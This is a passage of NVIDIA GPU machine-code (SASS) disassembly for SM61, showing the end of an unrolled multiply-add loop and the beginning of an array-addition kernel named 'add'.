/*0250*/ SHR.U32 R27, R16, 0x1e ; /* 0x3828000001e7101b */
/*0258*/ IADD32I R16, R11, 0x6 ; /* 0x1c00000000670b10 */
/* 0x001f8800fca007f1 */
/*0268*/ IADD R30.CC, R28, c[0x0][0x140] ; /* 0x4c10800005071c1e */
/*0270*/ SHL R26, R16, 0x2 ; /* 0x384800000027101a */
/*0278*/ IADD.X R31, R27, c[0x0][0x144] ; /* 0x4c10080005171b1f */
/* 0x001f8400fe2007f0 */
/*0288*/ { IADD R28.CC, R28, c[0x0][0x148] ; /* 0x4c10800005271c1c */
/*0290*/ LDG.E R30, [R30] }
/* 0xeed4200000071e1e */
/*0298*/ SHR.U32 R16, R16, 0x1e ; /* 0x3828000001e71010 */
/* 0x011fc000fc400fe4 */
/*02a8*/ IADD32I R18, R11, 0x7 ; /* 0x1c00000000770b12 */
/*02b0*/ IADD.X R29, R27, c[0x0][0x14c] ; /* 0x4c10080005371b1d */
/*02b8*/ { IADD R2.CC, R26, c[0x0][0x140] ; /* 0x4c10800005071a02 */
/* 0x001f8800fca007b1 */
/*02c8*/ LDG.E R29, [R28] }
/* 0xeed4200000071c1d */
/*02d0*/ SHL R24, R18, 0x2 ; /* 0x3848000000271218 */
/*02d8*/ IADD.X R3, R16, c[0x0][0x144] ; /* 0x4c10080005171003 */
/* 0x001f84001e2007f0 */
/*02e8*/ { IADD R26.CC, R26, c[0x0][0x148] ; /* 0x4c10800005271a1a */
/*02f0*/ LDG.E R28, [R2] }
/* 0xeed420000007021c */
/*02f8*/ SHR.U32 R18, R18, 0x1e ; /* 0x3828000001e71212 */
/* 0x001fc000fc4007e4 */
/*0308*/ IADD32I R19, R11, 0x8 ; /* 0x1c00000000870b13 */
/*0310*/ IADD.X R27, R16, c[0x0][0x14c] ; /* 0x4c1008000537101b */
/*0318*/ { IADD R16.CC, R24, c[0x0][0x140] ; /* 0x4c10800005071810 */
/* 0x001fcc00fd8007b1 */
/*0328*/ LDG.E R27, [R26] }
/* 0xeed4200000071a1b */
/*0330*/ SHL R22, R19, 0x2 ; /* 0x3848000000271316 */
/*0338*/ DEPBAR.LE SB5, 0x6 ; /* 0xf0f0000034670000 */
/* 0x001fc000fc4007e1 */
/*0348*/ FFMA R15, R15, R17, R14 ; /* 0x5980070001170f0f */
/*0350*/ IADD.X R17, R18, c[0x0][0x144] ; /* 0x4c10080005171211 */
/*0358*/ { IADD R24.CC, R24, c[0x0][0x148] ; /* 0x4c10800005271818 */
/* 0x001f8800fca001f1 */
/*0368*/ LDG.E R26, [R16] }
/* 0xeed420000007101a */
/*0370*/ SHR.U32 R14, R19, 0x1e ; /* 0x3828000001e7130e */
/*0378*/ IADD.X R25, R18, c[0x0][0x14c] ; /* 0x4c10080005371219 */
/* 0x001f8400f6c007f0 */
/*0388*/ { IADD32I R18, R11, 0x9 ; /* 0x1c00000000970b12 */
/*0390*/ LDG.E R25, [R24] }
/* 0xeed4200000071819 */
/*0398*/ SHL R20, R18, 0x2 ; /* 0x3848000000271214 */
/* 0x001f9400fc2007f3 */
/*03a8*/ DEPBAR.LE SB5, 0x5 ; /* 0xf0f0000034570000 */
/*03b0*/ FFMA R13, R6, R13, R15 ; /* 0x5980078000d7060d */
/*03b8*/ IADD R6.CC, R22, c[0x0][0x140] ; /* 0x4c10800005071606 */
/* 0x001fc000fc4007e1 */
/*03c8*/ FFMA R15, R7, R8, R13 ; /* 0x598006800087070f */
/*03d0*/ IADD.X R7, R14, c[0x0][0x144] ; /* 0x4c10080005170e07 */
/*03d8*/ { IADD R22.CC, R22, c[0x0][0x148] ; /* 0x4c10800005271616 */
/* 0x001fcc00fd0002f1 */
/*03e8*/ LDG.E R24, [R6] }
/* 0xeed4200000070618 */
/*03f0*/ SHR.U32 R8, R18, 0x1e ; /* 0x3828000001e71208 */
/*03f8*/ DEPBAR.LE SB5, 0x3 ; /* 0xf0f0000034370000 */
/* 0x001fc000fc4007e1 */
/*0408*/ FFMA R15, R4, R5, R15 ; /* 0x598007800057040f */
/*0410*/ IADD.X R23, R14, c[0x0][0x14c] ; /* 0x4c10080005370e17 */
/*0418*/ { IADD R14.CC, R20, c[0x0][0x140] ; /* 0x4c1080000507140e */
/* 0x001f8c00fc4007b1 */
/*0428*/ LDG.E R23, [R22] }
/* 0xeed4200000071617 */
/*0430*/ IADD32I R13, R11, 0xa ; /* 0x1c00000000a70b0d */
/*0438*/ FFMA R12, R12, R9, R15 ; /* 0x5980078000970c0c */
/* 0x000fc400fe0007e2 */
/*0448*/ IADD.X R15, R8, c[0x0][0x144] ; /* 0x4c1008000517080f */
/*0450*/ { IADD R20.CC, R20, c[0x0][0x148] ; /* 0x4c10800005271414 */
/*0458*/ LDG.E R22, [R14] }
/* 0xeed4200000070e16 */
/* 0x001f8800fc8207f1 */
/*0468*/ SHL R18, R13.reuse, 0x2 ; /* 0x3848000000270d12 */
/*0470*/ SHR.U32 R13, R13, 0x1e ; /* 0x3828000001e70d0d */
/*0478*/ IADD.X R21, R8, c[0x0][0x14c] ; /* 0x4c10080005370815 */
/* 0x001f9400f62007f0 */
/*0488*/ { IADD R4.CC, R18, c[0x0][0x140] ; /* 0x4c10800005071204 */
/*0490*/ LDG.E R21, [R20] }
/* 0xeed4200000071415 */
/*0498*/ IADD32I R9, R11, 0xb ; /* 0x1c00000000b70b09 */
/* 0x0013c400fe0007e2 */
/*04a8*/ IADD.X R5, R13, c[0x0][0x144] ; /* 0x4c10080005170d05 */
/*04b0*/ { IADD R18.CC, R18, c[0x0][0x148] ; /* 0x4c10800005271212 */
/*04b8*/ LDG.E R20, [R4] }
/* 0xeed4200000070414 */
/* 0x001f8800fc8207f1 */
/*04c8*/ SHL R8, R9.reuse, 0x2 ; /* 0x3848000000270908 */
/*04d0*/ SHR.U32 R9, R9, 0x1e ; /* 0x3828000001e70909 */
/*04d8*/ IADD.X R19, R13, c[0x0][0x14c] ; /* 0x4c10080005370d13 */
/* 0x001f9400f6200ff0 */
/*04e8*/ { IADD R2.CC, R8, c[0x0][0x140] ; /* 0x4c10800005070802 */
/*04f0*/ LDG.E R19, [R18] }
/* 0xeed4200000071213 */
/*04f8*/ IADD32I R13, R11, 0xc ; /* 0x1c00000000c70b0d */
/* 0x0003c402fe0007e2 */
/*0508*/ IADD.X R3, R9, c[0x0][0x144] ; /* 0x4c10080005170903 */
/*0510*/ { IADD R16.CC, R8, c[0x0][0x148] ; /* 0x4c10800005270810 */
/*0518*/ LDG.E R18, [R2] }
/* 0xeed4200000070212 */
/* 0x001f8800fc8207f1 */
/*0528*/ SHL R8, R13.reuse, 0x2 ; /* 0x3848000000270d08 */
/*0530*/ SHR.U32 R13, R13, 0x1e ; /* 0x3828000001e70d0d */
/*0538*/ IADD.X R17, R9, c[0x0][0x14c] ; /* 0x4c10080005370911 */
/* 0x001f9400f62027f0 */
/*0548*/ { IADD R6.CC, R8, c[0x0][0x140] ; /* 0x4c10800005070806 */
/*0550*/ LDG.E R17, [R16] }
/* 0xeed4200000071011 */
/*0558*/ IADD32I R9, R11, 0xd ; /* 0x1c00000000d70b09 */
/* 0x0007c408fe0007e2 */
/*0568*/ IADD.X R7, R13, c[0x0][0x144] ; /* 0x4c10080005170d07 */
/*0570*/ { IADD R14.CC, R8, c[0x0][0x148] ; /* 0x4c1080000527080e */
/*0578*/ LDG.E R16, [R6] }
/* 0xeed4200000070610 */
/* 0x001f8800fc8207f1 */
/*0588*/ SHL R8, R9.reuse, 0x2 ; /* 0x3848000000270908 */
/*0590*/ SHR.U32 R9, R9, 0x1e ; /* 0x3828000001e70909 */
/*0598*/ IADD.X R15, R13, c[0x0][0x14c] ; /* 0x4c10080005370d0f */
/* 0x001f9400f62087f0 */
/*05a8*/ { IADD R4.CC, R8, c[0x0][0x148] ; /* 0x4c10800005270804 */
/*05b0*/ LDG.E R15, [R14] }
/* 0xeed4200000070e0f */
/*05b8*/ IADD32I R13, R11, 0xe ; /* 0x1c00000000e70b0d */
/* 0x083fc400fe2007e1 */
/*05c8*/ IADD.X R5, R9, c[0x0][0x14c] ; /* 0x4c10080005370905 */
/*05d0*/ IADD R8.CC, R8, c[0x0][0x140] ; /* 0x4c10800005070808 */
/*05d8*/ SHL R2, R13.reuse, 0x2 ; /* 0x3848000000270d02 */
/* 0x001f88001e8007f0 */
/*05e8*/ { SHR.U32 R3, R13, 0x1e ; /* 0x3828000001e70d03 */
/*05f0*/ LDG.E R13, [R4] }
/* 0xeed420000007040d */
/*05f8*/ IADD.X R9, R9, c[0x0][0x144] ; /* 0x4c10080005170909 */
/* 0x003f9400362017f0 */
/*0608*/ { IADD R6.CC, R2, c[0x0][0x148] ; /* 0x4c10800005270206 */
/*0610*/ LDG.E R14, [R8] }
/* 0xeed420000007080e */
/*0618*/ IADD32I R4, R11, 0xf ; /* 0x1c00000000f70b04 */
/* 0x001fc400fe0007e2 */
/*0628*/ IADD.X R7, R3, c[0x0][0x14c] ; /* 0x4c10080005370307 */
/*0630*/ { IADD R2.CC, R2, c[0x0][0x140] ; /* 0x4c10800005070202 */
/*0638*/ LDG.E R6, [R6] }
/* 0xeed4200000070606 */
/* 0x001f8800fc8217f1 */
/*0648*/ SHL R8, R4.reuse, 0x2 ; /* 0x3848000000270408 */
/*0650*/ SHR.U32 R31, R4, 0x1e ; /* 0x3828000001e7041f */
/*0658*/ IADD.X R3, R3, c[0x0][0x144] ; /* 0x4c10080005170303 */
/* 0x001f8800f6c007f0 */
/*0668*/ { IADD R4.CC, R8, c[0x0][0x148] ; /* 0x4c10800005270804 */
/*0670*/ LDG.E R3, [R2] }
/* 0xeed4200000070203 */
/*0678*/ IADD.X R5, R31, c[0x0][0x14c] ; /* 0x4c10080005371f05 */
/* 0x001f8800fec007f0 */
/*0688*/ { IADD R8.CC, R8, c[0x0][0x140] ; /* 0x4c10800005070808 */
/*0690*/ LDG.E R4, [R4] }
/* 0xeed4200000070404 */
/*0698*/ IADD.X R9, R31, c[0x0][0x144] ; /* 0x4c10080005171f09 */
/* 0x001f9800fe6007b5 */
/*06a8*/ LDG.E R9, [R8] ; /* 0xeed4200000070809 */
/*06b0*/ DEPBAR.LE SB5, 0x9 ; /* 0xf0f0000034970000 */
/*06b8*/ FFMA R29, R29, R30, R12 ; /* 0x5980060001e71d1d */
/* 0x001f8400fec007e1 */
/*06c8*/ FFMA R27, R27, R28, R29 ; /* 0x59800e8001c71b1b */
/*06d0*/ IADD32I R0, R0, 0x10 ; /* 0x1c00000001070000 */
/*06d8*/ ISETP.NE.AND P0, PT, R0, RZ, PT ; /* 0x5b6b03800ff70007 */
/* 0x001f8400fe6007ec */
/*06e8*/ IADD32I R11, R11, 0x10 ; /* 0x1c00000001070b0b */
/*06f0*/ DEPBAR.LE SB5, 0x8 ; /* 0xf0f0000034870000 */
/*06f8*/ FFMA R25, R25, R26, R27 ; /* 0x59800d8001a71919 */
/* 0x001fd400fc2007f5 */
/*0708*/ DEPBAR.LE SB5, 0x7 ; /* 0xf0f0000034770000 */
/*0710*/ FFMA R23, R23, R24, R25 ; /* 0x59800c8001871717 */
/*0718*/ DEPBAR.LE SB5, 0x6 ; /* 0xf0f0000034670000 */
/* 0x001f8400fea007e1 */
/*0728*/ FFMA R21, R21, R22, R23 ; /* 0x59800b8001671515 */
/*0730*/ DEPBAR.LE SB5, 0x5 ; /* 0xf0f0000034570000 */
/*0738*/ FFMA R19, R19, R20, R21 ; /* 0x59800a8001471313 */
/* 0x001fd400fc2007f5 */
/*0748*/ DEPBAR.LE SB5, 0x4 ; /* 0xf0f0000034470000 */
/*0750*/ FFMA R17, R17, R18, R19 ; /* 0x5980098001271111 */
/*0758*/ DEPBAR.LE SB5, 0x3 ; /* 0xf0f0000034370000 */
/* 0x001f8400fea007e1 */
/*0768*/ FFMA R15, R15, R16, R17 ; /* 0x5980088001070f0f */
/*0770*/ DEPBAR.LE SB5, 0x2 ; /* 0xf0f0000034270000 */
/*0778*/ FFMA R13, R13, R14, R15 ; /* 0x5980078000e70d0d */
/* 0x041fc000fcc007f5 */
/*0788*/ DEPBAR.LE SB5, 0x1 ; /* 0xf0f0000034170000 */
/*0790*/ FFMA R3, R6, R3, R13 ; /* 0x5980068000370603 */
/*0798*/ { FFMA R14, R4, R9, R3 ; /* 0x598001800097040e */
/* 0x001f9840fe2007fd */
/*07a8*/ @P0 BRA 0x60 }
/* 0xe2400fff8b00000f */
/*07b0*/ SHR R0, R10.reuse, 0x1e ; /* 0x3829000001e70a00 */
/*07b8*/ ISCADD R4.CC, R10, c[0x0][0x150], 0x2 ; /* 0x4c18810005470a04 */
/* 0x001ffc00fea007e2 */
/*07c8*/ IADD.X R5, R0, c[0x0][0x154] ; /* 0x4c10080005570005 */
/*07d0*/ STG.E [R4], R14 ; /* 0xeedc20000007040e */
/*07d8*/ EXIT ; /* 0xe30000000007000f */
/* 0x001f8000fc0007ff */
/*07e8*/ BRA 0x7e0 ; /* 0xe2400fffff07000f */
/*07f0*/ NOP; /* 0x50b0000000070f00 */
/*07f8*/ NOP; /* 0x50b0000000070f00 */
..........................
Function : _Z3addPKfS0_Pfi
.headerflags @"EF_CUDA_SM61 EF_CUDA_PTX_SM(EF_CUDA_SM61)"
/* 0x001c4400fe0007f6 */
/*0008*/ MOV R1, c[0x0][0x20] ; /* 0x4c98078000870001 */
/*0010*/ { MOV R8, RZ ; /* 0x5c9807800ff70008 */
/*0018*/ S2R R0, SR_CTAID.X }
/* 0xf0c8000002570000 */
/* 0x083fc400e7e007f0 */
/*0028*/ { MOV32I R30, 0xffffff00 ; /* 0x010ffffff007f01e */
/*0030*/ S2R R2, SR_TID.X }
/* 0xf0c8000002170002 */
/*0038*/ XMAD.MRG R3, R0.reuse, c[0x0] [0x8].H1, RZ ; /* 0x4f107f8000270003 */
/* 0x001fd800fec217f6 */
/*0048*/ XMAD R2, R0.reuse, c[0x0] [0x8], R2 ; /* 0x4e00010000270002 */
/*0050*/ XMAD.PSL.CBCC R0, R0.H1, R3.H1, R2 ; /* 0x5b30011800370000 */
/*0058*/ MOV R11, R0 ; /* 0x5c9807800007000b */
/* 0x001fd040fe2207f1 */
/*0068*/ SHL R6, R11.reuse, 0x2 ; /* 0x3848000000270b06 */
/*0070*/ IADD32I R4, R11.reuse, 0x1 ; /* 0x1c00000000170b04 */
/*0078*/ SHR.U32 R7, R11, 0x1e ; /* 0x3828000001e70b07 */
/* 0x001f8440fe2007f1 */
/*0088*/ IADD R2.CC, R6, c[0x0][0x140] ; /* 0x4c10800005070602 */
/*0090*/ SHL R26, R4.reuse, 0x2 ; /* 0x384800000027041a */
/*0098*/ SHR.U32 R5, R4, 0x1e ; /* 0x3828000001e70405 */
/* 0x001fc000fe4207f3 */
/*00a8*/ IADD32I R4, R11.reuse, 0x2 ; /* 0x1c00000000270b04 */
/*00b0*/ IADD.X R3, R7, c[0x0][0x144] ; /* 0x4c10080005170703 */
/*00b8*/ { IADD R6.CC, R6, c[0x0][0x148] ; /* 0x4c10800005270606 */
/* 0x001fc440fe2007f1 */
/*00c8*/ LDG.E R21, [R2] }
/* 0xeed4200000070215 */
/*00d0*/ SHL R24, R4.reuse, 0x2 ; /* 0x3848000000270418 */
/*00d8*/ SHR.U32 R9, R4, 0x1e ; /* 0x3828000001e70409 */
/* 0x081fc000fe4007e3 */
/*00e8*/ IADD32I R4, R11, 0x3 ; /* 0x1c00000000370b04 */
/*00f0*/ IADD.X R7, R7, c[0x0][0x14c] ; /* 0x4c10080005370707 */
/*00f8*/ { IADD R16.CC, R26.reuse, c[0x0][0x140] ; /* 0x4c10800005071a10 */
/* 0x081fc800fea000b1 */
/*0108*/ LDG.E R20, [R6] }
/* 0xeed4200000070614 */
/*0110*/ SHL R12, R4, 0x2 ; /* 0x384800000027040c */
/*0118*/ IADD.X R17, R5.reuse, c[0x0][0x144] ; /* 0x4c10080005170511 */
/* 0x001f8800fec007f0 */
/*0128*/ { IADD R26.CC, R26, c[0x0][0x148] ; /* 0x4c10800005271a1a */
/*0130*/ LDG.E R17, [R16] }
/* 0xeed4200000071011 */
/*0138*/ IADD.X R27, R5, c[0x0][0x14c] ; /* 0x4c1008000537051b */
/* 0x001fd400362207f0 */
/*0148*/ { IADD R22.CC, R24.reuse, c[0x0][0x140] ; /* 0x4c10800005071816 */
/*0150*/ LDG.E R10, [R26] }
/* 0xeed4200000071a0a */
/*0158*/ SHR.U32 R5, R4, 0x1e ; /* 0x3828000001e70405 */
/* 0x001fd400fe2207f1 */
/*0168*/ IADD.X R23, R9.reuse, c[0x0][0x144] ; /* 0x4c10080005170917 */
/*0170*/ IADD R24.CC, R24, c[0x0][0x148] ; /* 0x4c10800005271818 */
/*0178*/ IADD32I R4, R11, 0x4 ; /* 0x1c00000000470b04 */
/* 0x081fd440fe2007e1 */
/*0188*/ IADD.X R25, R9, c[0x0][0x14c] ; /* 0x4c10080005370919 */
/*0190*/ IADD R18.CC, R12.reuse, c[0x0][0x140] ; /* 0x4c10800005070c12 */
/*0198*/ SHL R9, R4.reuse, 0x2 ; /* 0x3848000000270409 */
/* 0x001fc000fe2007f1 */
/*01a8*/ IADD.X R19, R5, c[0x0][0x144] ; /* 0x4c10080005170513 */
/*01b0*/ IADD R12.CC, R12, c[0x0][0x148] ; /* 0x4c10800005270c0c */
/*01b8*/ { SHR.U32 R28, R4, 0x1e ; /* 0x3828000001e7041c */
/* 0x000ec800fe0002f5 */
/*01c8*/ LDG.E R4, [R24] }
/* 0xeed4200000071804 */
/*01d0*/ { IADD.X R13, R5, c[0x0][0x14c] ; /* 0x4c1008000537050d */
/*01d8*/ LDG.E R5, [R22] }
/* 0xeed4200000071605 */
/* 0x001f8400fec007f0 */
/*01e8*/ { IADD R14.CC, R9, c[0x0][0x148] ; /* 0x4c1080000527090e */
/*01f0*/ LDG.E R3, [R12] }
/* 0xeed4200000070c03 */
/*01f8*/ IADD.X R15, R28, c[0x0][0x14c] ; /* 0x4c10080005371c0f */
/* 0x001fc00016c00ff0 */
/*0208*/ { IADD R6.CC, R9, c[0x0][0x140] ; /* 0x4c10800005070906 */
/*0210*/ LDG.E R9, [R18] }
/* 0xeed4200000071209 */
/*0218*/ { IADD.X R7, R28, c[0x0][0x144] ; /* 0x4c10080005171c07 */
/* 0x0006d842fe0007f2 */
/*0228*/ LDG.E R2, [R14] }
/* 0xeed4200000070e02 */
/*0230*/ { IADD32I R26, R11.reuse, 0x5 ; /* 0x1c00000000570b1a */
/*0238*/ LDG.E R16, [R6] }
/* 0xeed4200000070610 */
/* 0x011ff400fe2227f1 */
/*0248*/ SHL R24, R26.reuse, 0x2 ; /* 0x3848000000271a18 */
/*0250*/ SHR.U32 R25, R26, 0x1e ; /* 0x3828000001e71a19 */
/*0258*/ IADD32I R22, R11, 0x6 ; /* 0x1c00000000670b16 */
/* 0x081fc441fea007e1 */
/*0268*/ IADD R26.CC, R24, c[0x0][0x140] ; /* 0x4c1080000507181a */
/*0270*/ SHL R19, R22.reuse, 0x2 ; /* 0x3848000000271613 */
/*0278*/ IADD.X R27, R25.reuse, c[0x0][0x144] ; /* 0x4c1008000517191b */
/* 0x001fd000fe2007f1 */
/*0288*/ IADD R12.CC, R24, c[0x0][0x148] ; /* 0x4c1080000527180c */
/*0290*/ SHR.U32 R22, R22, 0x1e ; /* 0x3828000001e71616 */
/*0298*/ IADD32I R18, R11, 0x7 ; /* 0x1c00000000770b12 */
/* 0x0003c442fe0007e2 */
/*02a8*/ IADD.X R13, R25, c[0x0][0x14c] ; /* 0x4c1008000537190d */
/*02b0*/ { IADD R6.CC, R19.reuse, c[0x0][0x140] ; /* 0x4c10800005071306 */
/*02b8*/ LDG.E R29, [R12] }
/* 0xeed4200000070c1d */
/* 0x001fc400fe2207f5 */
/*02c8*/ SHL R24, R18.reuse, 0x2 ; /* 0x3848000000271218 */
/*02d0*/ IADD.X R7, R22, c[0x0][0x144] ; /* 0x4c10080005171607 */
/*02d8*/ IADD R14.CC, R19, c[0x0][0x148] ; /* 0x4c1080000527130e */
/* 0x001fc400fc8007f1 */
/*02e8*/ SHR.U32 R18, R18, 0x1e ; /* 0x3828000001e71212 */
/*02f0*/ IADD32I R19, R11, 0x8 ; /* 0x1c00000000870b13 */
/*02f8*/ IADD.X R15, R22, c[0x0][0x14c] ; /* 0x4c1008000537160f */
/* 0x001fd840fe2207f6 */
/*0308*/ IADD R22.CC, R24.reuse, c[0x0][0x140] ; /* 0x4c10800005071816 */
/*0310*/ IADD.X R23, R18.reuse, c[0x0][0x144] ; /* 0x4c10080005171217 */
/*0318*/ IADD R24.CC, R24, c[0x0][0x148] ; /* 0x4c10800005271818 */
/* 0x001fc840fe0007f2 */
/*0328*/ IADD.X R25, R18, c[0x0][0x14c] ; /* 0x4c10080005371219 */
/*0330*/ { IADD32I R18, R11.reuse, 0x9 ; /* 0x1c00000000970b12 */
/*0338*/ LDG.E R25, [R24] }
/* 0xeed4200000071819 */
/* 0x001fcc00f66007f0 */
/*0348*/ { IADD32I R31, R11, 0xe ; /* 0x1c00000000e70b1f */
/*0350*/ LDG.E R24, [R22] }
/* 0xeed4200000071618 */
/*0358*/ DEPBAR.LE SB5, 0x5 ; /* 0xf0f0000034570000 */
/* 0x081fc400fe2007e6 */
/*0368*/ FADD R21, R20, R21 ; /* 0x5c58000001571415 */
/*0370*/ FADD R21, R21, R8 ; /* 0x5c58000000871515 */
/*0378*/ SHL R8, R19.reuse, 0x2 ; /* 0x3848000000271308 */
/* 0x001fd800fe6007f0 */
/*0388*/ { SHR.U32 R19, R19, 0x1e ; /* 0x3828000001e71313 */
/*0390*/ DEPBAR.LE SB5, 0x4 }
/* 0xf0f0000034470000 */
/*0398*/ FADD R10, R10, R17 ; /* 0x5c58000001170a0a */
/* 0x001fcc00fc2007f1 */
/*03a8*/ FADD R10, R21, R10 ; /* 0x5c58000000a7150a */
/*03b0*/ SHL R20, R18, 0x2 ; /* 0x3848000000271214 */
/*03b8*/ DEPBAR.LE SB5, 0x3 ; /* 0xf0f0000034370000 */
/* 0x001fc440fea007f1 */
/*03c8*/ FADD R5, R4, R5 ; /* 0x5c58000000570405 */
/*03d0*/ IADD R4.CC, R8.reuse, c[0x0][0x140] ; /* 0x4c10800005070804 */
/*03d8*/ FADD R17, R10, R5 ; /* 0x5c58000000570a11 */
/* 0x001fcc00fda007f1 */
/*03e8*/ IADD.X R5, R19, c[0x0][0x144] ; /* 0x4c10080005171305 */
/*03f0*/ IADD R8.CC, R8, c[0x0][0x148] ; /* 0x4c10800005270808 */
/*03f8*/ DEPBAR.LE SB5, 0x2 ; /* 0xf0f0000034270000 */
/* 0x001fc400fc2007f1 */
/*0408*/ LDG.E R22, [R4] ; /* 0xeed4200000070416 */
/*0410*/ FADD R3, R3, R9 ; /* 0x5c58000000970303 */
/*0418*/ SHR.U32 R10, R18, 0x1e ; /* 0x3828000001e7120a */
/* 0x001fc800fe0007f2 */
/*0428*/ IADD.X R9, R19, c[0x0][0x14c] ; /* 0x4c10080005371309 */
/*0430*/ { IADD R18.CC, R20, c[0x0][0x140] ; /* 0x4c10800005071412 */
/*0438*/ LDG.E R23, [R8] }
/* 0xeed4200000070817 */
/* 0x001fcc00ff4007f1 */
/*0448*/ FADD R17, R17, R3 ; /* 0x5c58000000371111 */
/*0450*/ IADD32I R3, R11, 0xa ; /* 0x1c00000000a70b03 */
/*0458*/ DEPBAR.LE SB5, 0x1 ; /* 0xf0f0000034170000 */
/* 0x001fc440fe2007e1 */
/*0468*/ FADD R16, R2, R16 ; /* 0x5c58000001070210 */
/*0470*/ IADD.X R19, R10.reuse, c[0x0][0x144] ; /* 0x4c10080005170a13 */
/*0478*/ IADD R20.CC, R20, c[0x0][0x148] ; /* 0x4c10800005271414 */
/* 0x001fc400fe2207f3 */
/*0488*/ SHL R2, R3.reuse, 0x2 ; /* 0x3848000000270302 */
/*0490*/ FADD R28, R17, R16 ; /* 0x5c5800000107111c */
/*0498*/ SHR.U32 R3, R3, 0x1e ; /* 0x3828000001e70303 */
/* 0x001fc000f64007f0 */
/*04a8*/ { IADD.X R21, R10, c[0x0][0x14c] ; /* 0x4c10080005370a15 */
/*04b0*/ LDG.E R10, [R26] }
/* 0xeed4200000071a0a */
/*04b8*/ { IADD32I R17, R11, 0xb ; /* 0x1c00000000b70b11 */
/* 0x0002d841fe0001f1 */
/*04c8*/ LDG.E R27, [R14] }
/* 0xeed4200000070e1b */
/*04d0*/ { IADD R12.CC, R2.reuse, c[0x0][0x140] ; /* 0x4c1080000507020c */
/*04d8*/ LDG.E R26, [R6] }
/* 0xeed420000007061a */
/* 0x001fc000fe4007f0 */
/*04e8*/ { IADD.X R13, R3, c[0x0][0x144] ; /* 0x4c1008000517030d */
/*04f0*/ LDG.E R21, [R20] }
/* 0xeed4200000071415 */
/*04f8*/ { IADD R2.CC, R2, c[0x0][0x148] ; /* 0x4c10800005270202 */
/* 0x001fc440fe0007b2 */
/*0508*/ LDG.E R20, [R18] }
/* 0xeed4200000071214 */
/*0510*/ { SHL R16, R17.reuse, 0x2 ; /* 0x3848000000271110 */
/*0518*/ LDG.E R18, [R12] }
/* 0xeed4200000070c12 */
/* 0x083fc000fe4017e3 */
/*0528*/ SHR.U32 R15, R17, 0x1e ; /* 0x3828000001e7110f */
/*0530*/ IADD.X R3, R3, c[0x0][0x14c] ; /* 0x4c10080005370303 */
/*0538*/ { IADD R6.CC, R16.reuse, c[0x0][0x140] ; /* 0x4c10800005071006 */
/* 0x001fc400fea000b1 */
/*0548*/ LDG.E R19, [R2] }
/* 0xeed4200000070213 */
/*0550*/ IADD32I R17, R11, 0xc ; /* 0x1c00000000c70b11 */
/*0558*/ IADD.X R7, R15, c[0x0][0x144] ; /* 0x4c10080005170f07 */
/* 0x001fd000fc2007f1 */
/*0568*/ IADD R16.CC, R16, c[0x0][0x148] ; /* 0x4c10800005271010 */
/*0570*/ SHL R14, R17, 0x2 ; /* 0x384800000027110e */
/*0578*/ SHR.U32 R9, R17, 0x1e ; /* 0x3828000001e71109 */
/* 0x001fc840fe0007f2 */
/*0588*/ IADD.X R17, R15, c[0x0][0x14c] ; /* 0x4c10080005370f11 */
/*0590*/ { IADD R4.CC, R14.reuse, c[0x0][0x140] ; /* 0x4c10800005070e04 */
/*0598*/ LDG.E R17, [R16] }
/* 0xeed4200000071011 */
/* 0x001fc400368007f0 */
/*05a8*/ { IADD32I R15, R11, 0xd ; /* 0x1c00000000d70b0f */
/*05b0*/ LDG.E R16, [R6] }
/* 0xeed4200000070610 */
/*05b8*/ IADD.X R5, R9, c[0x0][0x144] ; /* 0x4c10080005170905 */
/* 0x003fd040fe2007e1 */
/*05c8*/ IADD R14.CC, R14, c[0x0][0x148] ; /* 0x4c10800005270e0e */
/*05d0*/ SHL R8, R15.reuse, 0x2 ; /* 0x3848000000270f08 */
/*05d8*/ SHR.U32 R3, R15, 0x1e ; /* 0x3828000001e70f03 */
/* 0x001fc800fe0007f2 */
/*05e8*/ IADD.X R15, R9, c[0x0][0x14c] ; /* 0x4c1008000537090f */
/*05f0*/ { IADD R12.CC, R8, c[0x0][0x148] ; /* 0x4c1080000527080c */
/*05f8*/ LDG.E R15, [R14] }
/* 0xeed4200000070e0f */
/* 0x001f8800168007f0 */
/*0608*/ { SHL R2, R31, 0x2 ; /* 0x3848000000271f02 */
/*0610*/ LDG.E R14, [R4] }
/* 0xeed420000007040e */
/*0618*/ IADD.X R13, R3, c[0x0][0x14c] ; /* 0x4c1008000537030d */
/* 0x001fc800fec007f0 */
/*0628*/ { IADD R8.CC, R8, c[0x0][0x140] ; /* 0x4c10800005070808 */
/*0630*/ LDG.E R13, [R12] }
/* 0xeed4200000070c0d */
/*0638*/ IADD.X R9, R3, c[0x0][0x144] ; /* 0x4c10080005170309 */
/* 0x005fc400562007f0 */
/*0648*/ { SHR.U32 R3, R31, 0x1e ; /* 0x3828000001e71f03 */
/*0650*/ LDG.E R12, [R8] }
/* 0xeed420000007080c */
/*0658*/ IADD R6.CC, R2, c[0x0][0x148] ; /* 0x4c10800005270206 */
/* 0x001fc000fc400ff5 */
/*0668*/ IADD32I R4, R11, 0xf ; /* 0x1c00000000f70b04 */
/*0670*/ IADD.X R7, R3, c[0x0][0x14c] ; /* 0x4c10080005370307 */
/*0678*/ { IADD R2.CC, R2, c[0x0][0x140] ; /* 0x4c10800005070202 */
/* 0x001fc844fea007f1 */
/*0688*/ LDG.E R6, [R6] }
/* 0xeed4200000070606 */
/*0690*/ SHL R8, R4.reuse, 0x2 ; /* 0x3848000000270408 */
/*0698*/ IADD.X R3, R3, c[0x0][0x144] ; /* 0x4c10080005170303 */
/* 0x001fd800f62007f0 */
/*06a8*/ { SHR.U32 R31, R4, 0x1e ; /* 0x3828000001e7041f */
/*06b0*/ LDG.E R3, [R2] }
/* 0xeed4200000070203 */
/*06b8*/ IADD R4.CC, R8, c[0x0][0x148] ; /* 0x4c10800005270804 */
/* 0x001fd800fe0007e2 */
/*06c8*/ IADD.X R5, R31, c[0x0][0x14c] ; /* 0x4c10080005371f05 */
/*06d0*/ { IADD R8.CC, R8, c[0x0][0x140] ; /* 0x4c10800005070808 */
/*06d8*/ LDG.E R4, [R4] }
/* 0xeed4200000070404 */
/* 0x001fcc00f6a007f2 */
/*06e8*/ IADD.X R9, R31, c[0x0][0x144] ; /* 0x4c10080005171f09 */
/*06f0*/ LDG.E R9, [R8] ; /* 0xeed4200000070809 */
/*06f8*/ DEPBAR.LE SB5, 0x9 ; /* 0xf0f0000034970000 */
/* 0x001fc400fcc007f1 */
/*0708*/ FADD R24, R25, R24 ; /* 0x5c58000001871918 */
/*0710*/ IADD32I R30, R30, 0x10 ; /* 0x1c00000001071e1e */
